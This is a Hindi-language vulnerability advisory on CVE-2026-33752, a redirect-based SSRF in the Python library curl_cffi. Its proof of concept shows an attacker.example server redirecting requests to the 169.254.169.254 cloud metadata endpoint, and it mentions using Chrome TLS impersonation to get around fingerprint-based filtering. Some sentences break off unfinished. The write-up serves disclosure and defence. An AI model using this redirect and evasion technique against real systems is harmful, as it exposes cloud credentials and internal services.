
curl_cffi में रीडायरेक्ट-आधारित SSRF भेद्यता का प्रदर्शन करता है जो आंतरिक नेटवर्क तक पहुँच की अनुमति देता है, साथ ही PoC कोड और TLS प्रतिरूपण बाईपास का विश्लेषण भी शामिल है।
CVE-2026-33752 (curl_cffi में रीडायरेक्ट-आधारित SSRF जिससे आंतरिक नेटवर्क तक पहुंच संभव होती है)
curl_cffi आंतरिक IP रेंज तक अनुरोधों को प्रतिबंधित नहीं करता है, और अंतर्निहित libcurl के माध्यम से स्वचालित रूप से रीडायरेक्ट का अनुसरण करता है।
इसके कारण, एक हमलावर-नियंत्रित URL अनुरोधों को क्लाउड मेटाडेटा एंडपॉइंट जैसी आंतरिक सेवाओं पर रीडायरेक्ट कर सकता है। इसके अतिरिक्त, curl_cffi की TLS इम्पर्सनेशन सुविधा इन अनुरोधों को वैध ब्राउज़र ट्रैफ़िक के रूप में प्रदर्शित कर सकती है, जो कुछ नेटवर्क नियंत्रणों को बायपास कर सकती है।
यह समस्या इस बात से उत्पन्न होती है कि curl_cffi आउटबाउंड अनुरोधों को कैसे संभालता है
इसका मतलब है कि भले ही कोई एप्लिकेशन केवल बाहरी URL के लिए अनुरोधों की अनुमति देता है, एक हमलावर यह कर सकता है
परिणामस्वरूप, आंतरिक एंडपॉइंट (जैसे क्लाउड इंस्टेंस मेटाडेटा API) तक पहुंचा जा सकता है।
इसके अतिरिक्त, curl_cffi TLS फिंगरप्रिंट इम्पर्सनेशन का समर्थन करता है (जैसे, impersonate="chrome")। ऐसे वातावरणों में जहां आउटबाउंड अनुरोध TLS फिंगरप्रिंटिंग के आधार पर फ़िल्टर किए जाते हैं, यह ऐसे अनुरोधों का पता लगाना या उन्हें ब्लॉक करना कठिन बना सकता है।
यह व्यवहार पहले रिपोर्ट किए गए रीडायरेक्ट-आधारित SSRF मुद्दों जैसे CVE-2025-68616 के समान है, जहां रीडायरेक्ट ने अनपेक्षित आंतरिक संसाधनों तक पहुंच की अनुमति दी थी।
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/
पीड़ित कोड:
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)
परिणाम
import curl_cffi\
resp = curl_cffi.get(
"https://attacker.example/test",
impersonate="chrome")
कुछ वातावरणों में, यह अनुरोध को TLS-आधारित फ़िल्टरिंग नियंत्रणों को बायपास करने में मदद कर सकता है।
एक हमलावर जो अनुरोधित URL को नियंत्रित कर सकता है, वह निम्न में सक्षम हो सकता है: